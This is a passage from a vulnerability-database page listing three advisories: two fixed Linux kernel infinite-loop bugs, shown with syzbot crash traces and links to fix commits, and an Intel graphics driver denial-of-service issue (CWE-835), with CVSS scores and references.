"details": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Fix task hung while purging oob_skb in GC.\n\nsyzbot reported a task hung; at the same time, GC was looping infinitely\nin list_for_each_entry_safe() for OOB skb. [0]\n\nsyzbot demonstrated that the list_for_each_entry_safe() was not actually\nsafe in this case.\n\nA single skb could have references for multiple sockets. If we free such\na skb in the list_for_each_entry_safe(), the current and next sockets could\nbe unlinked in a single iteration.\n\nunix_notinflight() uses list_del_init() to unlink the socket, so the\nprefetched next socket forms a loop itself and list_for_each_entry_safe()\nnever stops.\n\nHere, we must use while() and make sure we always fetch the first socket.\n\n[0]:\nSending NMI from CPU 0 to CPUs 1:\nNMI backtrace for cpu 1\nCPU: 1 PID: 5065 Comm: syz-executor236 Not tainted 6.8.0-rc3-syzkaller-00136-g1f719a2f3fa6 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nRIP: 0010:preempt_count arch/x86/include/asm/preempt.h:26 [inline]\nRIP: 0010:check_kcov_mode kernel/kcov.c:173 [inline]\nRIP: 0010:__sanitizer_cov_trace_pc+0xd/0x60 kernel/kcov.c:207\nCode: cc cc cc cc 66 0f 1f 84 00 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 65 48 8b 14 25 40 c2 03 00 \u003c65\u003e 8b 05 b4 7c 78 7e a9 00 01 ff 00 48 8b 34 24 74 0f f6 c4 01 74\nRSP: 0018:ffffc900033efa58 EFLAGS: 00000283\nRAX: ffff88807b077800 RBX: ffff88807b077800 RCX: 1ffffffff27b1189\nRDX: ffff88802a5a3b80 RSI: ffffffff8968488d RDI: ffff88807b077f70\nRBP: ffffc900033efbb0 R08: 0000000000000001 R09: fffffbfff27a900c\nR10: ffffffff93d48067 R11: ffffffff8ae000eb R12: ffff88807b077800\nR13: dffffc0000000000 R14: ffff88807b077e40 R15: 0000000000000001\nFS: 0000000000000000(0000) GS:ffff8880b9500000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000564f4fc1e3a8 CR3: 000000000d57a000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cNMI\u003e\n \u003c/NMI\u003e\n \u003cTASK\u003e\n unix_gc+0x563/0x13b0 net/unix/garbage.c:319\n unix_release_sock+0xa93/0xf80 net/unix/af_unix.c:683\n unix_release+0x91/0xf0 net/unix/af_unix.c:1064\n __sock_release+0xb0/0x270 net/socket.c:659\n sock_close+0x1c/0x30 net/socket.c:1421\n __fput+0x270/0xb80 fs/file_table.c:376\n task_work_run+0x14f/0x250 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0xa8a/0x2ad0 kernel/exit.c:871\n do_group_exit+0xd4/0x2a0 kernel/exit.c:1020\n __do_sys_exit_group kernel/exit.c:1031 [inline]\n __se_sys_exit_group kernel/exit.c:1029 [inline]\n __x64_sys_exit_group+0x3e/0x50 kernel/exit.c:1029\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xd5/0x270 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x6f/0x77\nRIP: 0033:0x7f9d6cbdac09\nCode: Unable to access opcode bytes at 0x7f9d6cbdabdf.\nRSP: 002b:00007fff5952feb8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\nRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f9d6cbdac09\nRDX: 000000000000003c RSI: 00000000000000e7 RDI: 0000000000000000\nRBP: 00007f9d6cc552b0 R08: ffffffffffffffb8 R09: 0000000000000006\nR10: 0000000000000006 R11: 0000000000000246 R12: 00007f9d6cc552b0\nR13: 0000000000000000 R14: 00007f9d6cc55d00 R15: 00007f9d6cbabe70\n \u003c/TASK\u003e",
"id": "GHSA-95rc-29j2-q3vr",
"modified": "2025-03-18T18:30:41Z",
"published": "2024-04-04T09:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26780"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/25236c91b5ab4a26a56ba2e79b8060cf4e047839"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/2a3d40b4025fcfe51b04924979f1653993b17669"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/36f7371de977f805750748e80279be7e370df85c"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/69e0f04460f4037e01e29f0d9675544f62aafca3"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/cb8890318dde26fc89c6ea67d6e9070ab50b6e91"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-968X-W27Q-C8FX
Vulnerability from github – Published: 2024-04-02 09:30 – Updated: 2025-03-17 18:31In the Linux kernel, the following vulnerability has been resolved:
netdevsim: avoid potential loop in nsim_dev_trap_report_work()
Many syzbot reports include the following trace [1]
If nsim_dev_trap_report_work() can not grab the mutex, it should rearm itself at least one jiffie later.
[1] Sending NMI from CPU 1 to CPUs 0: NMI backtrace for cpu 0 CPU: 0 PID: 32383 Comm: kworker/0:2 Not tainted 6.8.0-rc2-syzkaller-00031-g861c0981648f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 Workqueue: events nsim_dev_trap_report_work RIP: 0010:bytes_is_nonzero mm/kasan/generic.c:89 [inline] RIP: 0010:memory_is_nonzero mm/kasan/generic.c:104 [inline] RIP: 0010:memory_is_poisoned_n mm/kasan/generic.c:129 [inline] RIP: 0010:memory_is_poisoned mm/kasan/generic.c:161 [inline] RIP: 0010:check_region_inline mm/kasan/generic.c:180 [inline] RIP: 0010:kasan_check_range+0x101/0x190 mm/kasan/generic.c:189 Code: 07 49 39 d1 75 0a 45 3a 11 b8 01 00 00 00 7c 0b 44 89 c2 e8 21 ed ff ff 83 f0 01 5b 5d 41 5c c3 48 85 d2 74 4f 48 01 ea eb 09 <48> 83 c0 01 48 39 d0 74 41 80 38 00 74 f2 eb b6 41 bc 08 00 00 00 RSP: 0018:ffffc90012dcf998 EFLAGS: 00000046 RAX: fffffbfff258af1e RBX: fffffbfff258af1f RCX: ffffffff8168eda3 RDX: fffffbfff258af1f RSI: 0000000000000004 RDI: ffffffff92c578f0 RBP: fffffbfff258af1e R08: 0000000000000000 R09: fffffbfff258af1e R10: ffffffff92c578f3 R11: ffffffff8acbcbc0 R12: 0000000000000002 R13: ffff88806db38400 R14: 1ffff920025b9f42 R15: ffffffff92c578e8 FS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000c00994e078 CR3: 000000002c250000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: instrument_atomic_read include/linux/instrumented.h:68 [inline] atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline] queued_spin_is_locked include/asm-generic/qspinlock.h:57 [inline] debug_spin_unlock kernel/locking/spinlock_debug.c:101 [inline] do_raw_spin_unlock+0x53/0x230 kernel/locking/spinlock_debug.c:141 __raw_spin_unlock_irqrestore include/linux/spinlock_api_smp.h:150 [inline] _raw_spin_unlock_irqrestore+0x22/0x70 kernel/locking/spinlock.c:194 debug_object_activate+0x349/0x540 lib/debugobjects.c:726 debug_work_activate kernel/workqueue.c:578 [inline] insert_work+0x30/0x230 kernel/workqueue.c:1650 __queue_work+0x62e/0x11d0 kernel/workqueue.c:1802 __queue_delayed_work+0x1bf/0x270 kernel/workqueue.c:1953 queue_delayed_work_on+0x106/0x130 kernel/workqueue.c:1989 queue_delayed_work include/linux/workqueue.h:563 [inline] schedule_delayed_work include/linux/workqueue.h:677 [inline] nsim_dev_trap_report_work+0x9c0/0xc80 drivers/net/netdevsim/dev.c:842 process_one_work+0x886/0x15d0 kernel/workqueue.c:2633 process_scheduled_works kernel/workqueue.c:2706 [inline] worker_thread+0x8b9/0x1290 kernel/workqueue.c:2787 kthread+0x2c6/0x3a0 kernel/kthread.c:388 ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242
{
"affected": [],
"aliases": [
"CVE-2024-26681"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-02T07:15:44Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetdevsim: avoid potential loop in nsim_dev_trap_report_work()\n\nMany syzbot reports include the following trace [1]\n\nIf nsim_dev_trap_report_work() can not grab the mutex,\nit should rearm itself at least one jiffie later.\n\n[1]\nSending NMI from CPU 1 to CPUs 0:\nNMI backtrace for cpu 0\nCPU: 0 PID: 32383 Comm: kworker/0:2 Not tainted 6.8.0-rc2-syzkaller-00031-g861c0981648f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\nWorkqueue: events nsim_dev_trap_report_work\n RIP: 0010:bytes_is_nonzero mm/kasan/generic.c:89 [inline]\n RIP: 0010:memory_is_nonzero mm/kasan/generic.c:104 [inline]\n RIP: 0010:memory_is_poisoned_n mm/kasan/generic.c:129 [inline]\n RIP: 0010:memory_is_poisoned mm/kasan/generic.c:161 [inline]\n RIP: 0010:check_region_inline mm/kasan/generic.c:180 [inline]\n RIP: 0010:kasan_check_range+0x101/0x190 mm/kasan/generic.c:189\nCode: 07 49 39 d1 75 0a 45 3a 11 b8 01 00 00 00 7c 0b 44 89 c2 e8 21 ed ff ff 83 f0 01 5b 5d 41 5c c3 48 85 d2 74 4f 48 01 ea eb 09 \u003c48\u003e 83 c0 01 48 39 d0 74 41 80 38 00 74 f2 eb b6 41 bc 08 00 00 00\nRSP: 0018:ffffc90012dcf998 EFLAGS: 00000046\nRAX: fffffbfff258af1e RBX: fffffbfff258af1f RCX: ffffffff8168eda3\nRDX: fffffbfff258af1f RSI: 0000000000000004 RDI: ffffffff92c578f0\nRBP: fffffbfff258af1e R08: 0000000000000000 R09: fffffbfff258af1e\nR10: ffffffff92c578f3 R11: ffffffff8acbcbc0 R12: 0000000000000002\nR13: ffff88806db38400 R14: 1ffff920025b9f42 R15: ffffffff92c578e8\nFS: 0000000000000000(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000c00994e078 CR3: 000000002c250000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cNMI\u003e\n \u003c/NMI\u003e\n \u003cTASK\u003e\n instrument_atomic_read include/linux/instrumented.h:68 [inline]\n atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline]\n queued_spin_is_locked include/asm-generic/qspinlock.h:57 [inline]\n debug_spin_unlock kernel/locking/spinlock_debug.c:101 [inline]\n do_raw_spin_unlock+0x53/0x230 kernel/locking/spinlock_debug.c:141\n __raw_spin_unlock_irqrestore include/linux/spinlock_api_smp.h:150 [inline]\n _raw_spin_unlock_irqrestore+0x22/0x70 kernel/locking/spinlock.c:194\n debug_object_activate+0x349/0x540 lib/debugobjects.c:726\n debug_work_activate kernel/workqueue.c:578 [inline]\n insert_work+0x30/0x230 kernel/workqueue.c:1650\n __queue_work+0x62e/0x11d0 kernel/workqueue.c:1802\n __queue_delayed_work+0x1bf/0x270 kernel/workqueue.c:1953\n queue_delayed_work_on+0x106/0x130 kernel/workqueue.c:1989\n queue_delayed_work include/linux/workqueue.h:563 [inline]\n schedule_delayed_work include/linux/workqueue.h:677 [inline]\n nsim_dev_trap_report_work+0x9c0/0xc80 drivers/net/netdevsim/dev.c:842\n process_one_work+0x886/0x15d0 kernel/workqueue.c:2633\n process_scheduled_works kernel/workqueue.c:2706 [inline]\n worker_thread+0x8b9/0x1290 kernel/workqueue.c:2787\n kthread+0x2c6/0x3a0 kernel/kthread.c:388\n ret_from_fork+0x45/0x80 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:242\n \u003c/TASK\u003e",
"id": "GHSA-968x-w27q-c8fx",
"modified": "2025-03-17T18:31:38Z",
"published": "2024-04-02T09:30:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26681"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/0193e0660cc6689c794794b471492923cfd7bfbc"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/6eecddd9c3c8d6e3a097531cdc6d500335b35e46"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ba5e1272142d051dcc57ca1d3225ad8a089f9858"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d91964cdada76740811b7c621239f9c407820dbc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-96H8-7X7C-3R2V
Vulnerability from github – Published: 2022-05-13 01:30 – Updated: 2022-05-13 01:30Denial of Service in Unified Shader Compiler in Intel Graphics Drivers before 10.18.x.5056 (aka 15.33.x.5056), 10.18.x.5057 (aka 15.36.x.5057) and 20.19.x.5058 (aka 15.40.x.5058) may allow an unprivileged user to potentially create an infinite loop and crash an application via local access.
{
"affected": [],
"aliases": [
"CVE-2018-12154"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-10-15T18:29:00Z",
"severity": "MODERATE"
},
"details": "Denial of Service in Unified Shader Compiler in Intel Graphics Drivers before 10.18.x.5056 (aka 15.33.x.5056), 10.18.x.5057 (aka 15.36.x.5057) and 20.19.x.5058 (aka 15.40.x.5058) may allow an unprivileged user to potentially create an infinite loop and crash an application via local access.",
"id": "GHSA-96h8-7x7c-3r2v",
"modified": "2022-05-13T01:30:58Z",
"published": "2022-05-13T01:30:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12154"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT210634"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT210722"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00166.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2019/Oct/55"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2019/Oct/56"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/105582"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.